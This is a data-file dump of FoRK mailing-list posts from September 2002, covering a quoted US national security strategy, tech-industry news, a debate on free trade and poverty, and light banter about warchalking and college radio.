&gt; coordinated effort that isolates the terrorists. Once the regional
&gt; campaign localizes the threat to a particular state, we will help ensure
&gt; the state has the military, law enforcement, political, and financial
&gt; tools necessary to finish the task.
&gt;
&gt; The United States will continue to work with our allies to disrupt the
&gt; financing of terrorism. We will identify and block the sources of
&gt; funding for terrorism, freeze the assets of terrorists and those who
&gt; support them, deny terrorists access to the international financial
&gt; system, protect legitimate charities from being abused by terrorists,
&gt; and prevent the movement of terrorists' assets through alternative
&gt; financial networks.
&gt;
&gt; However, this campaign need not be sequential to be effective, the
&gt; cumulative effect across all regions will help achieve the results we
&gt; seek.
&gt;
&gt; We will disrupt and destroy terrorist organizations by:
&gt;
&gt; * direct and continuous action using all the elements of national and
&gt; international power. Our immediate focus will be those terrorist
&gt; organizations of global reach and any terrorist or state sponsor of
&gt; terrorism which attempts to gain or use weapons of mass destruction
&gt; (WMD) or their precursors;
&gt;
&gt; * defending the United States, the American people, and our interests
&gt; at home and abroad by identifying and destroying the threat before it
&gt; reaches our borders. While the United States will constantly strive to
&gt; enlist the support of the international community, we will not hesitate
&gt; to act alone, if necessary, to exercise our right of self-defense by
&gt; acting preemptively against such terrorists, to prevent them from doing
&gt; harm against our people and our country; and
&gt;
&gt; * denying further sponsorship, support, and sanctuary to terrorists
&gt; by convincing or compelling states to accept their sovereign
&gt; responsibilities.
&gt;
&gt;
&gt; We will also wage a war of ideas to win the battle against international
&gt; terrorism. This includes:
&gt;
&gt; * using the full influence of the United States, and working closely
&gt; with allies and friends, to make clear that all acts of terrorism are
&gt; illegitimate so that terrorism will be viewed in the same light as
&gt; slavery, piracy, or genocide: behavior that no respectable government
&gt; can condone or support and all must oppose;
&gt;
&gt; * supporting moderate and modern government, especially in the Muslim
&gt; world, to ensure that the conditions and ideologies that promote
&gt; terrorism do not find fertile ground in any nation;
&gt;
&gt; * diminishing the underlying conditions that spawn terrorism by
&gt; enlisting the international community to focus its efforts and resources
&gt; on areas most at risk; and
&gt;
&gt; * using effective public diplomacy to promote the free flow of
&gt; information and ideas to kindle the hopes and aspirations of freedom of
&gt; those in societies ruled by the sponsors of global terrorism.
&gt;
&gt;
&gt; While we recognize that our best defense is a good offense we are also
&gt; strengthening America's homeland security to protect against and deter
&gt; attack.
&gt;
&gt; This Administration has proposed the largest government reorganization
&gt; since the Truman Administration created the National Security Council
&gt; and the Department of Defense. Centered on a new Department of Homeland
&gt; Security and including a new unified military command and a fundamental
&gt; reordering of the FBI, our comprehensive plan to secure the homeland
&gt; encompasses every level of government and the cooperation of the public
&gt; and the private sector.
&gt;
&gt; This strategy will turn adversity into opportunity. For example,
&gt; emergency management systems will be better able to cope not just with
&gt; terrorism but with all hazards. Our medical system will be strengthened
&gt; to manage not just bioterror, but all infectious diseases and
&gt; mass-casualty dangers. Our border controls will not just stop
&gt; terrorists, but improve the efficient movement of legitimate traffic.
&gt;
&gt; While our focus is protecting America, we know that to defeat terrorism
&gt; in today's globalized world we need support from our allies and friends.
&gt; Wherever possible, the United States will rely on regional organizations
&gt; and state powers to meet their obligations to fight terrorism. Where
&gt; governments find the fight against terrorism beyond their capacities, we
&gt; will match their willpower and their resources with whatever help we and
&gt; our allies can provide.
&gt;
&gt; As we pursue the terrorists in Afghanistan, we will continue to work
&gt; with international organizations such as the United Nations, as well as
&gt; non-governmental organizations, and other countries to provide the
&gt; humanitarian, political, economic, and security assistance necessary to
&gt; rebuild Afghanistan so that it will never again abuse its people,
&gt; threaten its neighbors, and provide a haven for terrorists
&gt;
&gt; In the war against global terrorism, we will never forget that we are
&gt; ultimately fighting for our democratic values and way of life. Freedom
&gt; and fear are at war, and there will be no quick or easy end to this
&gt; conflict. In leading the campaign against terrorism, we are forging new,
&gt; productive international relationships and redefining existing ones in
&gt; ways that meet the challenges of the twenty-first century.
&gt;
&gt; IV. Work with Others To Defuse Regional Conflicts
&gt;
&gt;
&gt; "We build a world of justice, or we will live in a world of coercion.
&gt; The magnitude of our shared responsibilities makes our disagreements
&gt; look so small."
&gt;
&gt;
&gt;
&gt;
&gt;
&gt; President Bush
&gt; Berlin, Germany
&gt; May 23, 2002
&gt;
&gt;
&gt;
&gt; Concerned nations must remain actively engaged in critical regional
&gt; disputes to avoid explosive escalation and minimize human suffering. In
&gt; an increasingly interconnected world, regional crisis can strain our
&gt; alliances, rekindle rivalries among the major powers, and create
&gt; horrifying affronts to human dignity. When violence erupts and states
&gt; falter, the United States will work with friends and partners to
&gt; alleviate suffering and restore stability.
&gt;
&gt; No doctrine can anticipate every circumstance in which U.S. action --
&gt; direct or indirect -- is warranted. We have finite political, economic,
&gt; and military resources to meet our global priorities. The United States
&gt; will approach each case with these strategic principles in mind:
&gt;
&gt; * The United States should invest time and resources into building
&gt; international relationships and institutions that can help manage local
&gt; crises when they emerge.
&gt;
&gt; * The United States should be realistic about its ability to help
&gt; those who are unwilling or unready to help themselves. Where and when
&gt; people are ready to do their part, we will be willing to move decisively.
&gt;
&gt;
&gt; Policies in several key regions offer some illustrations of how we will
&gt; apply these principles:
&gt;
&gt; The Israeli-Palestinian conflict is critical because of the toll of
&gt; human suffering, because of America's close relationship with the state
&gt; of Israel and key Arab states, and because of that region's importance
&gt; to other global priorities of the United States. There can be no peace
&gt; for either side without freedom for both sides. America stands committed
&gt; to an independent and democratic Palestine, living beside Israel in
&gt; peace and security. Like all other people, Palestinians deserve a
&gt; government that serves their interests, and listens to their voices, and
&gt; counts their votes. The United States will continue to encourage all
&gt; parties to step up to their responsibilities as we seek a just and
&gt; comprehensive settlement to the conflict.
&gt;
&gt; The United States, the international donor community, and the World Bank
&gt; stand ready to work with a reformed Palestinian government on economic
&gt; development, increased humanitarian assistance and a program to
&gt; establish, finance, and monitor a truly independent judiciary. If
&gt; Palestinians embrace democracy, and the rule of law, confront
&gt; corruption, and firmly reject terror, they can count on American support
&gt; for the creation of a Palestinian state.
&gt;
&gt; Israel also has a large stake in the success of a democratic Palestine.
&gt; Permanent occupation threatens Israel's identity and democracy. So the
&gt; United States continues to challenge Israeli leaders to take concrete
&gt; steps to support the emergence of a viable, credible Palestinian state.
&gt; As there is progress towards security, Israel forces need to withdraw
&gt; fully to positions they held prior to September 28, 2000. And consistent
&gt; with the recommendations of the Mitchell Committee, Israeli settlement
&gt; activity in the occupied territories must stop. As violence subsides,
&gt; freedom of movement should be restored, permitting innocent Palestinians
&gt; to resume work and normal life. The United States can play a crucial
&gt; role but, ultimately, lasting peace can only come when Israelis and
&gt; Palestinians resolve the issues and end the conflict between them.
&gt;
&gt; In South Asia, the United States has also emphasized the need for India
&gt; and Pakistan to resolve their disputes. This administration invested
&gt; time and resources building strong bilateral relations with India and
&gt; Pakistan. These strong relations then gave us leverage to play a
&gt; constructive role when tensions in the region became acute. With
&gt; Pakistan, our bilateral relations have been bolstered by Pakistan's
&gt; choice to join the war against terror and move toward building a more
&gt; open and tolerant society. The Administration sees India's potential to
&gt; become one of the great democratic powers of the twenty-first century
&gt; and has worked hard to transform our relationship accordingly. Our
&gt; involvement in this regional dispute, building on earlier investments in
&gt; bilateral relations, looks first to concrete steps by India and Pakistan
&gt; that can help defuse military confrontation.
&gt;
&gt; Indonesia took courageous steps to create a working democracy and
&gt; respect for the rule of law. By tolerating ethnic minorities, respecting
&gt; the rule of law, and accepting open markets, Indonesia may be able to
&gt; employ the engine of opportunity that has helped lift some of its
&gt; neighbors out of poverty and desperation. It is the initiative by
&gt; Indonesia that allows U.S. assistance to make a difference.
&gt;
&gt; In the Western Hemisphere we have formed flexible coalitions with
&gt; countries that share our priorities, particularly Mexico, Brazil,
&gt; Canada, Chile, and Colombia. Together we will promote a truly democratic
&gt; hemisphere where our integration advances security, prosperity,
&gt; opportunity, and hope. We will work with regional institutions, such as
&gt; the Summit of the Americas process, the Organization of American States
&gt; (OAS), and the Defense Ministerial of the Americas for the benefit of
&gt; the entire hemisphere.
&gt;
&gt; Parts of Latin America confront regional conflict, especially arising
&gt; from the violence of drug cartels and their accomplices. This conflict
&gt; and unrestrained narcotics trafficking could imperil the health and
&gt; security of the United States. Therefore we have developed an active
&gt; strategy to help the Andean nations adjust their economies, enforce
&gt; their laws, defeat terrorist organizations, and cut off the supply of
&gt; drugs, while -- as important -- we work to reduce the demand for drugs
&gt; in our own country.
&gt;
&gt; In Colombia, we recognize the link between terrorist and extremist
&gt; groups that challenge the security of the state and drug trafficking
&gt; activities that help finance the operations of such groups. We are
&gt; working to help Colombia defend its democratic institutions and defeat
&gt; illegal armed groups of both the left and right by extending effective
&gt; sovereignty over the entire national territory and provide basic
&gt; security to the Colombian people.
&gt;
&gt; In Africa, promise and opportunity sit side by side with disease, war,
&gt; and desperate poverty. This threatens both a core value of the United
&gt; States -- preserving human dignity -- and our strategic priority --
&gt; combating global terror. American interests and American principles,
&gt; therefore, lead in the same direction: we will work with others for an
&gt; African continent that lives in liberty, peace, and growing prosperity.
&gt; Together with our European allies, we must help strengthen Africa's
&gt; fragile states, help build indigenous capability to secure porous
&gt; borders, and help build up the law enforcement and intelligence
&gt; infrastructure to deny havens f</t>
  </si>
  <si>
    <t>Weird... I never thought the govmint would get into funding this. You know
'weapons of mass destruction'. etc. etc.==
http://dc.internet.com/news/article.php/10849_1467121September 20, 2002
Senate Committee Passes Nanotech Bill
By Roy MarkThe Senate Commerce Committee unanimously passed on Thursday legislation to
promote nanotechnology research and development. Introduced by Sen. Ron
Wyden (D-Ore.), the 21st Century Nanotechnology Research and Development Act
would create the National Nanotechnology Research Program. The bill is
co-sponsored by Sen. Joe Lieberman (D-Conn.) and Sen. George Allen (R-Va.).The proposed program would be a coordinated interagency effort that would
support long-term nanoscale research and development and promote effective
education and training for the next generation of nanotechnology researchers
and professionals."The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U.S. certainly possesses the raw resources and talent to
lead the world in developing this technology. Our legislation will provide
the nation with a long-term focus and sustained commitment, and facilitate
new collaborations between government, academia, and industry that will
ensure our place at the head of the next wave of innovation."The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half-dozen federal agencies. I want America to marshal its various
nanotechnology efforts into one driving force to remain the world's leader
in this burgeoning field. And I believe federal support is essential to
achieving that goal.To study the potential long-term effects of nanotechnology, a new Center for
Societal, Ethical, Educational, Legal and Workforce Issues Related to
Nanotechnology would also be established.According to Lieberman, the bill closely tracks the recommendations of the
National Research Council (NRC), which completed a thorough review of the
National Nanotechnology Initiative in June.Those recommendations included establishing an independent advisory panel;
emphasizing long-term goals; striking a balance between long-term and
short-term research; supporting the development of research facilities,
equipment and instrumentation; creating special funding to support research
that falls in the breach between agency missions and programs; promoting
interdisciplinary research and research groups; facilitating technology
transition and outreach to industry; conducting studies on the societal
implications of nanotechnology, including those related to ethical,
educational, legal and workforce issues; and the development of metrics for
measuring progress toward program goals.</t>
  </si>
  <si>
    <t xml:space="preserve">
Related to the MS acquisition of XDegrees?==
http://www.internetnews.com/infra/article.php/1466271Sun Nabs Storage Startup
By Clint Boulton
Amid the flurry of news at its own SunNetwork 2002 conference in San
Francisco, Sun Microsystems Thursday said it has agreed to purchase data
storage concern Pirus Networks for an undisclosed amount of stock.The Palo Alto, Calif. networking firm bought the Acton, Mass.-based startup
with a keen eye for the startup's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console.Though major vendors make similar technology, Pirus competes with the likes
of Rhapsody Networks and Confluence Networks. Sun plucked Pirus after
scouting some 65 companies.Mark Lovington, vice president of marketing for Pirus, told internetnews.com
that Pirus and Sun have been in discussion for a while about a possible
acquisition. Pirus, he said, succeeded in a goal it shares with a lot of
storage startups -- to be acquired by one of the major systems vendors, such
as Sun IBM, HP, Hitachi."This is a huge opportunity for Pirus in a storage market dominated by 6,7
or 8 system-level players," Lovington said. "Sun sees this acquisition as a
critical element to their N1 initiative. The synergies were quite obvious."N1 is Sun's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 at a lower cost and with greater flexibility.While lagging behind other, more entrenched players, Sun is gaining ground
in the storage market with its Sun StorEdge Complete Storage Solutions,
according to a new report by IDC. John McArthur, group vice president of
IDC's Storage program, said Sun Microsystems and IBM posted the largest
increases in total storage revenue over Q1 2002, with 32% and 11% gains,
respectively. As of Q2, Sun held a 9 percent market share, with revenues of
$411 million.Sun's acquisition of Pirus is expected to close in the second quarter of
Sun's 2003 fiscal year, which ends December 29, 2002.</t>
  </si>
  <si>
    <t xml:space="preserve">
Im feeling a bit farklempt having spent the night at Todais with the
family so talk amongst yourself..here Ill give you a topicThe current state of IT can be thought of in terms of the Cold war with
the US and the UUSR being MS and Sun/IBM/OSS (does it matter which side
is which?), Apple as Cuba and the US legal system as the UN.Discuss.
</t>
  </si>
  <si>
    <t xml:space="preserve">The pay's not good (9,300 a year), but there is insurance, a 4,700 (I 
think) off a student loan, or for future education, and non-compete status 
for any govt. job after a year's service.  I moved to New Orleans 
yesterday, and I should be flying to DC in about a month to start the 
AmeriCorps training.  I'll be setting up a community technology center which 
will be used to teach computer literacy skills to low income folks (just, 
like, learning MS shit (yeah yeah, wtf am i doing?  I know.))  so that 
they can possibly find better jobs.  I'm sure I'll be doing all sorts 
of other things too, like helping folks with their taxes, writing grants, 
etc.  The website is www.americorps.org.  There are -all- sorts of jobs 
all over the country, so if someone out there can survive on the small 
salary, it's something s/he might want to take a look at.  Since Xi is in college and getting grants + scholarship + child support 
from dad, my load has gone down terrifically.  The IRS is after me for 
money I didn't make on the stock market, so it's a way to at least get 
into a situation where they will have to understand that yes, they will 
have to wait.  But bottom line benefit and motivation is the feelgood that ya get when 
you do this type of job.  I'm up for some of that.
Cindy-- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">At 9:34 PM -0700 on 9/20/02, Mr. FoRK wrote:
&gt; "Free trade and free markets have proven their ability to lift whole
&gt; societies out of poverty"
&gt; I'm not a socio-political/history buff - does anybody have some clear
&gt; examples?You're probably living in one, or you wouldn't be able to post here.;-).Cheers,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</si>
  <si>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DickensG'Quon Wrote "There is a greater darkness than the one we fight. It is the
darkness of  the soul that has lost its way." The war we fight is not
against powers  and principalities -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
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello fork,  So they have Aaron Schwartz on NPR's Weekend Edition talking
  about Warchalking.   I'll agree, its funny, his voice is squeaky and
  I'm jealous that he got on radio and I didn't...  But really, WTF is the big deal about warchalking?  I have yet to
  see any of it, anywhere.  LInk will probably pop up on www.npr.org later today.  -- 
Best regards,
 bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Chris,Oh I don't know, Time-lag synchrocity?Or mutual shared experience over time?
:)Its like 930 am..I can't function yet.  Lord knows its 630 where you
are.I say this should be a FoRK Posit.
CO&gt; Scary.  I was just listening to the radio (stream, from KUOW), and heard
CO&gt; the story just moments ago.CO&gt; We're on opposite sides of the continent, yet we appear to have just had a
CO&gt; shared experience.  There should be a name for that...CO&gt; Cheers -CO&gt;         /ccoCO&gt; On Sat, 21 Sep 2002 bitbitch@magnesium.net wrote:
&gt;&gt; 
&gt;&gt;   So they have Aaron Schwartz on NPR's Weekend Edition talking
&gt;&gt;   about Warchalking.   I'll agree, its funny, his voice is squeaky and
&gt;&gt;   I'm jealous that he got on radio and I didn't...
-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "f" == fork list  writes:    f&gt; "Free trade and free markets have proven their ability to lift
    f&gt; whole societies out of poverty" I'm not a
    f&gt; socio-political/history buff - does anybody have some clear
    f&gt; examples?China?  Ooops, no wait, scratch that.There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Canada.I've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 garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == R A Hettinga  writes:    R&gt; At 9:34 PM -0700 on 9/20/02, Mr. FoRK wrote:
    &gt;&gt; "Free trade and free markets have proven their ability to lift
    &gt;&gt; whole societies out of poverty" I'm not a
    &gt;&gt; socio-political/history buff - does anybody have some clear
    &gt;&gt; examples?    R&gt; You're probably living in one, or you wouldn't be able to post
    R&gt; here.Cool --- I wasn't aware that the US had lifted it's population out of
poverty!  When did this happen?  I wonder where the media gets the
idea that the wealth gap is widening and deepening...
-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1At 10:32 AM -0400 on 9/21/02, Gary Lawrence Murphy wrote:
&gt; Cool --- I wasn't aware that the US had lifted it's population out
&gt; of poverty! When did this happen? I wonder where the media gets the
&gt; idea that the wealth gap is widening and deepening...All the world loves a smartass...:-).Seriously. Look at he life expectancy and human carrying capacity of
this continent before the Europeans got here. Look at it now. Even
for descendants of the original inhabitants. Even for the descendents
of slaves, who were brought here by force.More stuff, cheaper. That's progress.Poverty, of course, is not relative. It's absolute. Disparity in
wealth has nothing to do with it.It's like saying that groups have rights, when, in truth, only
individuals do. Like group rights, "disparity" in wealth is
statistical sophistry.
Besides, even if you can't help the distribution, industrial wealth
is almost always transitory, and so is relative poverty, even when
there are no confiscatory death-taxes. The 20th anniversary Forbes
400 just came out, and only a few tens of people are still there
since 1982, a time which had significantly higher marginal taxes on
wealth, income, and inheritance than we do now. More to the point,
they're nowhere near the top.I'll take those odds. It is only when neofeudalism reasserts itself,
in the form of government regulation, confiscatory taxes, legislated
monopoly, corporate welfare, "non-profit" neoaristocratic tax dodges,
and legalized labor extortion that we get slowdowns in progress, like
what happened in Fabian-era Britain, or 1970's USA.In fact, it is in countries where wealth is the most "unfairly"
distributed, that you get the most improvement in the general --
economic -- welfare. More stuff cheaper, fewer people dying, more
people living longer.I'll take those odds as well. People take greater risks when the
returns are higher, improving the lot of us all as a result.Cheers,
RAH-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPYy3ysPxH8jf3ohaEQLqNQCg14YvF8NVYwKiRrghHdisBoNCOn8AoPcR
QUzorXeaLe5h3T1syKl7DFNT
=9kff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</si>
  <si>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 Original Message -----
From: "John Hall" 
&gt; Take a list of the richest countries.
&gt;
&gt; Take a list of the countries that have the counties where markets are
&gt; the most free.
&gt;
&gt; They are, essentially, the same list.
Umm... how many of these countries were in poverty &amp; lifted themselves up
after switching?
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: "R. A. Hettinga" 
&gt;
&gt;
&gt; &gt; "Free trade and free markets have proven their ability to lift whole
&gt; &gt; societies out of poverty"
&gt; &gt; I'm not a socio-political/history buff - does anybody have some clear
&gt; &gt; examples?
&gt;
&gt; You're probably living in one, or you wouldn't be able to post here.
&gt;
When was the whole US society in poverty &amp; was that before free trade &amp; free
markets?
I'm looking for transitions due to free xyz.
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: "R. A. Hettinga" &gt;
&gt; Seriously. Look at he life expectancy and human carrying capacity of
&gt; this continent before the Europeans got here. Look at it now. Even
&gt; for descendants of the original inhabitants. Even for the descendents
&gt; of slaves, who were brought here by force.
I wouldn't say that the societies of humans here before European occupancy
was 'lifted' by free xyz. Perhaps 'replaced' or 'sunk' or some other
description, but not 'lifted'. Also, the lifestyle of the remnants of those
societies is on average only marginally above poverty even today.
</t>
  </si>
  <si>
    <t xml:space="preserve">I went out and drew some chalk circles on my
sidewalk just so I wouldn't miss out on the experience.
I've collected half a dozen passwords &amp;
access to email accounts so far.Gregbitbitch@magnesium.net wrote:
&gt; Hello fork,
&gt; 
&gt;   So they have Aaron Schwartz on NPR's Weekend Edition talking
&gt;   about Warchalking.   I'll agree, its funny, his voice is squeaky and
&gt;   I'm jealous that he got on radio and I didn't...
&gt; 
&gt;   But really, WTF is the big deal about warchalking?  I have yet to
&gt;   see any of it, anywhere.
&gt; 
&gt;   LInk will probably pop up on www.npr.org later today.
&gt; 
&gt;   
&gt; 
-- 
Gregory Alan Bolcer, CTO  | work: +1.949.833.2800
gbolcer at endeavors.com  | http://endeavors.com
Endeavors Technology, Inc.| cell: +1.714.928.5476
</t>
  </si>
  <si>
    <t>&gt; As I've said before, American
&gt; Indian Reservations are quite 
&gt; possibly the only place on the 
&gt; planet where you can find trailer 
&gt; park shantytowns where every 
&gt; household is bringing in a
&gt; six-figure income.  I wish I 
&gt; could be exploited like that.  Like what, like the rare exception case you've raised or like the "on
average" case mentioned in the post you were replying to?Max</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message ----- 
From: "Gregory Alan Bolcer" 
&gt; I went out and drew some chalk circles on my
&gt; sidewalk just so I wouldn't miss out on the experience.
&gt; I've collected half a dozen passwords &amp;
&gt; access to email accounts so far.
&gt; 
&gt; Greg
hahaha! It takes a thief to catch a thief?
</t>
  </si>
  <si>
    <t xml:space="preserve">----- Original Message -----
From: "James Rogers" &gt; As I've said before, American
&gt; Indian Reservations are quite possibly the only place on the planet where
&gt; you can find trailer park shantytowns where every household is bringing in
a
&gt; six-figure income.  I wish I could be exploited like that.
Got bits?
(and I bet you probably /are/ being exploited, but you just don't know by
whom...)
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: "James Rogers" &gt; As I've said before, American
&gt; Indian Reservations are quite possibly the only place on the planet where
&gt; you can find trailer park shantytowns where every household is bringing in
a
&gt; six-figure income.  I wish I could be exploited like that.If you can't trust the guvmint census, who can you trust?===http://www.census.gov/Press-Release/www/2001/cb01fff15.htmlIncome and Poverty$31,799
Median household income for American Indians and Alaska Natives, based on a
1998-2000 average. This is higher than for African Americans ($28,679), not
statistically different from Hispanics ($31,703) and lower than for
non-Hispanic Whites ($45,514), and Asians and Pacific Islanders ($52,553).
25.9%
The poverty rate for American Indians and Alaska Natives, based on a
1998-2000 average. This rate was not statistically different from the rates
for African Americans and Hispanics, but was higher than those for
non-Hispanic Whites, and Asians and Pacific Islanders.
701,000
Number of American Indians and Alaska Natives below the poverty line, based
on a 1998-2000 average.
===
</t>
  </si>
  <si>
    <t xml:space="preserve">
Cool - I wonder what you'd look like standing in front of a bunch of
corporate executives...==
http://www.technologyreview.com/articles/wo_hellweg080102.aspThat's why, for example, Orth is trying to catch the interest of the
military with fabrics that change color when conductive fibers stitched into
the cloth heat and cool the material's thermochromatic inks. "The army wants
fully addressable, interactive camouflage," she says, "so that when you're
standing in front of bricks, your clothing looks like bricks. When you're in
grass, you look like grass. Accomplishing that would be like a space program
for e-textiles."</t>
  </si>
  <si>
    <t xml:space="preserve">Can anyone stop talking politics long enough to let me know that,
yes, indeed, they do remember the Suburban Lawns?Better yet, tell me where I should be listening for new music now that
P2P is dead and I still can't pick up KFJC very well.- Joe-- 
Give me time I will be clear; given time you'll understand.
What possesses me to right what you have suffered.
I'm in this mood because of scorn; I'm in a mood for total war.
To the darkened skies once more and ever onward.
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote:&gt;&gt;&gt;&gt;&gt;&gt;"R" == R A Hettinga  writes:
&gt;&gt;&gt;&gt;&gt;&gt;            
&gt;&gt;&gt;&gt;&gt;&gt;
&gt;
&gt;    R&gt; At 9:34 PM -0700 on 9/20/02, Mr. FoRK wrote:
&gt;    &gt;&gt; "Free trade and free markets have proven their ability to lift
&gt;    &gt;&gt; whole societies out of poverty" I'm not a
&gt;    &gt;&gt; socio-political/history buff - does anybody have some clear
&gt;    &gt;&gt; examples?
&gt;
&gt;    R&gt; You're probably living in one, or you wouldn't be able to post
&gt;    R&gt; here.
&gt;
&gt;Cool --- I wasn't aware that the US had lifted it's population out of
&gt;poverty!  When did this happen?  I wonder where the media gets the
&gt;idea that the wealth gap is widening and deepening...
&gt;
&gt;
&gt;  
&gt;
I wasn't aware that there was anyone who could use the words "free 
trade" about the United States and keep a straight face.Owen
</t>
  </si>
  <si>
    <t>Anarchist 'Scavenger Hunt' Raises D.C. Police Ire
Sat Sep 21, 3:37 PM ETWASHINGTON (Reuters) - An online "anarchist scavenger
hunt" proposed for next week's annual meeting of the
International Monetary Fund ( news - web sites) and
World Bank ( news - web sites) here has raised the ire
of police, who fear demonstrators could damage
property and wreak havoc.Break a McDonald's window, get 300 points. Puncture a
Washington D.C. police car tire to win 75 points.
Score 400 points for a pie in the face of a corporate
executive or World Bank delegate.D.C. Assistant Police Chief Terrance Gainer told a
congressional hearing on Friday that law authorities
were in talks to decide whether planned protests were,
"so deleterious to security efforts that we ought to
take proactive action."Several thousand people are expected to demonstrate
outside the IMF and World Bank headquarters next
weekend.The Anti-Capitalist Convergence, a D.C.-based
anarchist group, is also planning a day-long traffic
blockade, banner-drops and protests against major
corporations in the downtown core.Chuck, the 37 year-old webmaster of the anarchist site
www.infoshop.org who declined to give his last name,
told Reuters his scavenger hunt was meant as a joke."People were asking for things to do when they come to
D.C. We made the list to get people thinking, so they
don't do the boring, standard stuff," he said. "I
doubt people will actually keep track of what they do
for points."</t>
  </si>
  <si>
    <t xml:space="preserve">
Some interesting quotes...http://www.postfun.com/pfp/worbois.html
Thomas Jefferson:"I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earth."SIX HISTORIC AMERICANS,
by John E. Remsburg, letter to William Short
Jefferson again:"Christianity...(has become) the most perverted system that ever shone on
man. ...Rogueries, absurdities and untruths were perpetrated upon the
teachings of Jesus by a large band of dupes and importers led by Paul, the
first great corrupter of the teaching of Jesus."
</t>
  </si>
  <si>
    <t xml:space="preserve">LOL you rool  (:On Sat, 21 Sep 2002, Gregory Alan Bolcer wrote:&gt; I went out and drew some chalk circles on my
&gt; sidewalk just so I wouldn't miss out on the experience.
&gt; I've collected half a dozen passwords &amp;
&gt; access to email accounts so far.
&gt; 
&gt; Greg
&gt; 
&gt; bitbitch@magnesium.net wrote:
&gt; &gt; Hello fork,
&gt; &gt; 
&gt; &gt;   So they have Aaron Schwartz on NPR's Weekend Edition talking
&gt; &gt;   about Warchalking.   I'll agree, its funny, his voice is squeaky and
&gt; &gt;   I'm jealous that he got on radio and I didn't...
&gt; &gt; 
&gt; &gt;   But really, WTF is the big deal about warchalking?  I have yet to
&gt; &gt;   see any of it, anywhere.
&gt; &gt; 
&gt; &gt;   LInk will probably pop up on www.npr.org later today.
&gt; &gt; 
&gt; &gt;   
&gt; &gt; 
&gt; 
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Joseph S Barrera,  writes:    J&gt; Better yet, tell me where I should be listening for new music
    J&gt; now that P2P is dead and I still can't pick up KFJC very well.How about your local pub?(sorry couldn't resist)I still use Live365; slowly the disconnected stations are returning,
since the fee to stay on the air can be as low as $6/month, and if
your fave broadcaster won't pay, you're given the option to pay for
them.-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">"Oh my Janitor, boom, boom, boom."The best place for new music is right where it's
always been. College radio.   UCI, UCSD,USD, Claremont(?)'s
KSPC, UCLA, Cal Fullerton, Cal LA, Cal Pomona.GregJoseph S. Barrera III wrote:
&gt; Can anyone stop talking politics long enough to let me know that,
&gt; yes, indeed, they do remember the Suburban Lawns?
&gt; 
&gt; Better yet, tell me where I should be listening for new music now that
&gt; P2P is dead and I still can't pick up KFJC very well.
&gt; 
&gt; - Joe
&gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">reminds me of Cheney during the VP debates, when he declared his wealth was
not the product of government favors.http://www.ibiblio.org/pub/academic/communications/logs/Gulf-War/desert-stor
m/07(good time to refresh our memories re iraq . . .)starting a debate on govt. contracts,
gg-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Owen
Byrne
Sent: Sunday, September 22, 2002 11:04 AM
To: Owen Byrne
Cc: Gary Lawrence Murphy; Mr. FoRK; fork@spamassassin.taint.org; Digital Bearer
Settlement List
Subject: Re: sed /s/United States/Roman Empire/g
Owen Byrne wrote:&gt; R. A. Hettinga wrote:
&gt;
&gt;&gt; -----BEGIN PGP SIGNED MESSAGE-----
&gt;&gt; Hash: SHA1
&gt;&gt;
&gt;&gt; At 10:32 AM -0400 on 9/21/02, Gary Lawrence Murphy wrote:
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;&gt; Cool --- I wasn't aware that the US had lifted it's population out
&gt;&gt;&gt; of poverty! When did this happen? I wonder where the media gets the
&gt;&gt;&gt; idea that the wealth gap is widening and deepening...
&gt;&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt; All the world loves a smartass...
&gt;&gt;
&gt;&gt; :-).
&gt;&gt;
&gt;&gt; Seriously. Look at he life expectancy and human carrying capacity of
&gt;&gt; this continent before the Europeans got here. Look at it now. Even
&gt;&gt; for descendants of the original inhabitants. Even for the descendents
&gt;&gt; of slaves, who were brought here by force.
&gt;&gt;
&gt;&gt; More stuff, cheaper. That's progress.
&gt;&gt;
&gt;&gt; Poverty, of course, is not relative. It's absolute. Disparity in
&gt;&gt; wealth has nothing to do with it.
&gt;&gt;
&gt;&gt; It's like saying that groups have rights, when, in truth, only
&gt;&gt; individuals do. Like group rights, "disparity" in wealth is
&gt;&gt; statistical sophistry.
&gt;&gt;
&gt;&gt;
&gt;&gt; Besides, even if you can't help the distribution, industrial wealth
&gt;&gt; is almost always transitory, and so is relative poverty, even when
&gt;&gt; there are no confiscatory death-taxes. The 20th anniversary Forbes
&gt;&gt; 400 just came out, and only a few tens of people are still there
&gt;&gt; since 1982, a time which had significantly higher marginal taxes on
&gt;&gt; wealth, income, and inheritance than we do now. More to the point,
&gt;&gt; they're nowhere near the top.
&gt;&gt;
&gt;&gt;
